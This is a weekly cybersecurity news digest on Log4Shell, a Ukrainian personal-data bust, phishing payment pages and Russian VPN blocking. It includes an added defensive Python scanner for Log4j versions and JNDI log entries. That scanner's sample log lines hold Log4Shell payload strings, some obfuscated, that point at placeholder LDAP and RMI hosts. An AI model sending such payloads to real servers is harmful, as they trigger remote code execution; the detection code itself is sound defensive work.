
Log4j vulnerability, sale of 300 million personal data records, and other cybersecurity events
We’ve gathered the week’s most important cybersecurity news.
- Bug rated 10 out of 10: experts are alarmed by a vulnerability in the Log4j library that could grant attackers remote access to devices and servers. It is described as one of the most serious vulnerabilities in years.
- In Ukraine, suspects were detained in connection with the sale of personal data databases containing information on 300 million people.
- Fraudsters stole over 3 billion rubles from residents of Russia through fake payment systems.
“Cyberpandemic”: hackers mass-exploit the Log4j vulnerability. Experts call it the most serious bug in years
Researchers identified a critical vulnerability in the popular Java logging library Apache Log4j. It could allow attackers to gain remote access to devices and servers, even without extensive technical skills. The vulnerability has been dubbed Log4Shell (CVE-2021-44228).
The UK National Cyber Security Centre and the US Cybersecurity and Infrastructure Security Agency describe the bug as potentially the most serious discovered in recent years. The vulnerability received the maximum Common Vulnerability Scoring System (CVSS) score of 10 out of 10.
Log4j is used in the development of many systems, including those of Amazon, Apple iCloud, Cisco, Cloudflare, ElasticSearch, Red Hat, Steam, Tesla and Twitter, so the scale of Log4Shell exploitation could be colossal.
According to Bloomberg, the first reports about the vulnerability appeared in late November. Some time later the bug was being discussed on WeChat, and hackers began exploiting Log4Shell.
Earliest evidence we’ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC. That suggests it was in the wild at least 9 days before publicly disclosed. However, don’t see evidence of mass exploitation until after public disclosure.
— Matthew Prince 🌥 (@eastdakota) December 11, 2021
According to Netlab 360 researchers, attackers used the exploit to drop the Mirai and Muhstik malware onto devices. With their help hackers deployed cryptocurrency miners, conducted large-scale DDoS attacks, or installed Cobalt Strike beacons to locate vulnerable servers.
The Apache Software Foundation issued an emergency update (2.15.0). However, the fix turned out to be incomplete, and a further update, 2.16.0, was released.
Nearly all Log4j 2 versions, from 2.0-beta9 to 2.14.1, are vulnerable. The simplest and most effective defense against Log4Shell is to upgrade to a fixed version of the library, experts say.
However, for now experts cannot fully assess the scale of the consequences of exploiting the vulnerability. Bitdefender has already identified ransomware exploiting Log4Shell, and Netlab stated that at least ten hacker groups are exploiting the bug. The vulnerability affected nearly half of corporate networks in Russia, writes «Коммерсантъ».
Check Point Research recorded more than 800,000 attack attempts exploiting Log4Shell and the spread of new variants of the original exploit, of which there are already more than 60.
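As an added illustration (not code from the article, from Apache, or from any vendor it cites), the Python below covers the two practical points raised above: it checks whether a Log4j 2 version string falls in the affected 2.0-beta9 to 2.14.1 range, and it scans web-server access-log lines for the JNDI lookup strings that trigger Log4Shell, including the URL-encoded and nested-lookup variants that defeat a naive `${jndi:` grep. It relies on a mechanism the article does not spell out: the bug fires when a logged string contains a `${jndi:...}` lookup, and Log4j's other lookups (`${lower:j}`, `${upper:j}`, the `${name:-x}` default-value form behind `${::-j}` and `${env:NOPE:-j}`) let attackers assemble the keyword at runtime. The log lines are constructed for this example and the addresses are documentation ranges; the version parser is this example's own simplified logic.

```python
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote

# --- 1. Version range check (article: 2.0-beta9 through 2.14.1 are affected) ---

# Simplified version grammar for this example: N.N[.N][-betaN|-rcN].
_VER_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(beta|rc)(\d+))?$", re.IGNORECASE)

def parse_version(v: str) -> Optional[Tuple[int, int, int, int, int]]:
    """Turn '2.0-beta9', '2.0-rc1' or '2.14.1' into a sortable tuple.
    Pre-releases sort before the final release with the same number."""
    m = _VER_RE.match(v.strip())
    if not m:
        return None
    major, minor, patch = int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)
    if m.group(4):
        stage = {"beta": 0, "rc": 1}[m.group(4).lower()]
        return (major, minor, patch, stage, int(m.group(5)))
    return (major, minor, patch, 2, 0)  # 2 = final release

VULN_LOW = parse_version("2.0-beta9")
VULN_HIGH = parse_version("2.14.1")

def is_vulnerable_version(v: str) -> bool:
    """True when v lies in the affected range the article gives.
    Unparsable strings return False: treat those as 'unknown', not 'safe'."""
    t = parse_version(v)
    return t is not None and VULN_LOW <= t <= VULN_HIGH

# --- 2. Log scanning for JNDI lookup payloads -------------------------------

# Innermost ${...} lookup: a body with no further '$', '{' or '}' inside it.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")

def _resolve(m) -> str:
    """Evaluate one obfuscation lookup roughly as Log4j's interpolator would.
    Covered forms: ${lower:x}, ${upper:x}, and the default-value form
    ${name:-x} (which is how ${::-j} and ${env:NOPE:-j} yield 'j').
    A real ${jndi:...} lookup, and anything unknown, is left untouched."""
    body = m.group(1)
    key = body.lower()
    if key.startswith("jndi:"):
        return m.group(0)
    if key.startswith("lower:"):
        return body[len("lower:"):].lower()
    if key.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        return body.split(":-", 1)[1]
    return m.group(0)

def normalize_lookups(s: str, max_rounds: int = 50) -> str:
    """Collapse innermost lookups until nothing changes, so that
    '${${lower:j}ndi:...}' becomes '${jndi:...}'. Not exhaustive: Log4j has
    more lookups than are modelled here, so a miss is not proof of a clean line."""
    for _ in range(max_rounds):
        new = _INNERMOST.sub(_resolve, s)
        if new == s:
            break
        s = new
    return s

# After normalization, the lookup keyword and (optionally) its URL scheme.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(?:([a-z][a-z0-9+.-]*)\s*:)?[^}]*\}?", re.IGNORECASE)

def scan_line(line: str) -> Optional[Dict[str, str]]:
    """Return {'scheme', 'payload'} if the line carries a JNDI lookup, else None.
    URL-decoding first catches payloads smuggled in request paths and query strings."""
    norm = normalize_lookups(unquote(line))
    m = _JNDI.search(norm)
    if not m:
        return None
    return {"scheme": (m.group(1) or "").lower(), "payload": m.group(0)}

def scan_logs(lines: List[str]) -> List[Dict[str, object]]:
    """Scan access-log lines; report 1-based line number, scheme and payload."""
    hits: List[Dict[str, object]] = []
    for i, line in enumerate(lines, start=1):
        r = scan_line(line)
        if r:
            hits.append({"line": i, **r})
    return hits

# Constructed sample access-log lines (not real traffic; 198.51.100.0/24 is a
# documentation range). Lines 2-5 carry payloads in progressively obfuscated form;
# line 6 is a benign lookup-looking string that must not be flagged.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.10:1389/a}"',
    '10.0.0.8 - - [10/Dec/2021:12:00:03 +0000] "GET /?x=${${lower:j}ndi:${lower:ldap}://198.51.100.11/b} HTTP/1.1" 404 0 "-" "curl/7.68"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://198.51.100.12/c}"',
    '10.0.0.10 - - [10/Dec/2021:12:00:05 +0000] "GET /?q=%24%7B%24%7Benv%3ANaN%3A-j%7Dndi%3Aldap%3A%2F%2F198.51.100.13%2Fd%7D HTTP/1.1" 200 10 "-" "-"',
    '10.0.0.11 - - [10/Dec/2021:12:00:06 +0000] "GET /docs/${version} HTTP/1.1" 200 10 "-" "-"',
]

if __name__ == "__main__":
    for v in ("2.14.1", "2.16.0"):
        print(v, "in affected range" if is_vulnerable_version(v) else "not in affected range")
    for h in scan_logs(SAMPLE_LOGS):
        print(f"line {h['line']}: scheme={h['scheme']} payload={h['payload']}")
```

Two caveats for anyone adapting this. The version check is a range test only: Apache later shipped fixed backports for older Java (for example 2.12.2 for Java 7), which fall inside that range by number, so confirm the actual jar in use rather than trusting a string. And the normalizer only models a handful of lookups; it is a triage aid for log review, not a substitute for upgrading the library.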
“This is clearly one of the most serious vulnerabilities on the Internet in recent years. When we discussed the possibility of a cyberpandemic, this is exactly what we had in mind — rapidly spreading destructive attacks,”
— the experts said.
In Ukraine, sale of personal data databases containing information on 300 million people was halted
Ukrainian cyberpolice identified 51 suspects in the distribution of personal data of citizens of Ukraine, Europe and the USA.
During Operation “DATA” law enforcement seized about 100 databases containing data on 300 million people, more than 90,000 GB in total. The information in them is current as of 2020-2021.
The databases contained data on clients of banks and companies, as well as login credentials for email, social networks, online stores and other services.
Law enforcement also stopped the activity of one of the largest sites selling personal data, including full names, phone numbers and places of registration.
Microsoft patched the vulnerability used by Emotet; Google fixed a zero-day vulnerability
Microsoft patched a vulnerability exploited by the Emotet malware; it could be used in phishing campaigns targeting Windows users.
This week Google developers also rolled out a new Chrome version that fixes a zero-day vulnerability already being exploited in the wild.
Fraudsters stole more than 3 billion rubles from Russians via fake payment systems
Group-IB experts told ForkLog about the fraudulent scheme using fake payment systems. The loss for Russian bank customers was estimated at 3.15 billion rubles.
According to the specialists, criminals began forging 3-D Secure pages, the additional verification step used to protect online card payments.
Such fake payment pages are dangerous because they are hard to spot: they carry the logos of Visa, Mastercard or Mir and do not arouse buyers’ suspicion, Group-IB said.
“Lured by fraudulent advertising, spam, or online classified ads, a customer visits a phishing page of an online store, marketplace or service. After selecting a product or service, the victim enters their card details into the fraudulent site’s payment form,” the experts explain.
The card data ends up on a server controlled by the fraudsters, from which payments are routed through banks’ P2P transfer services with one of the criminals’ cards as the recipient.
Russian users performed over 11,000 payments a day via such phishing pages, totaling 8.6 million rubles daily.
Lantern VPN uses a decentralized tool to bypass possible blocking in Russia
The Lantern VPN service, which could be blocked in Russia, has responded to the threat.
“In its unwarranted attempts to build a centrally controlled Internet, the Russian government is tightening the noose around the ability of Russians to use modern technology to exercise fundamental rights,” the statement reads.
Lantern said it is not surprised by Roskomnadzor’s interest in the service, “especially after recent news about aggressive Russian actions against the Tor network”.
The service has no intention of cooperating with Russian law enforcement or complying with content-filtering demands:
“Moreover, Lantern is built with a censorship-resistant decentralized content distribution tool that is currently available to Russian users on desktop and will appear on mobile devices this month”.
Recall that in early December Roskomnadzor sent notices to companies using the VPN services Betternet, Lantern, X-VPN, Cloudflare WARP, Tachyon VPN and PrivateTunnel. The agency argues they help bypass restrictions, enabling access to information banned in Russia.
Bills on unified rules for remote voting, and on its abolition, were introduced in the State Duma
A bill on unified rules for remote electronic voting (DEG) for all regions and elections at all levels was registered in the State Duma.
The head of the Central Election Commission, Ella Pamfilova, said that next year the number of regions where DEG will be used is planned to be expanded.
Meanwhile a group of CPRF deputies submitted to the State Duma a bill to repeal DEG for elections in Russia.
Also on ForkLog:
- Hackers drained hot wallets of the AscendEX exchange for more than $77 million.
- Unknown individuals hacked the Indian prime minister’s Twitter account and announced that Bitcoin had been legalized.
- The operator of a botnet for stealing bitcoins got four years in prison in the United States.
- Crystal Blockchain said that over 10 years the damage to crypto platforms and their users from criminals’ actions reached $12.1 billion.
- The BadgerDAO DeFi project team disclosed details of the $121 million hack.
- Chainalysis said that rug pulls accounted for 37% of criminals’ income for 2021.
- Hackers compromised users’ wallets on the Vulcan Forged platform and moved tokens worth $100 million.
- Kaspersky Lab experts said that 47% of attacks in 2021 involved ransomware.
What to read this weekend?
Almost a year ago news broke of an attack on US government systems, and then on many companies around the world via SolarWinds. In light of concerns about the Log4j vulnerability, we recall the hack that was described as one of the most sophisticated and largest in recent years.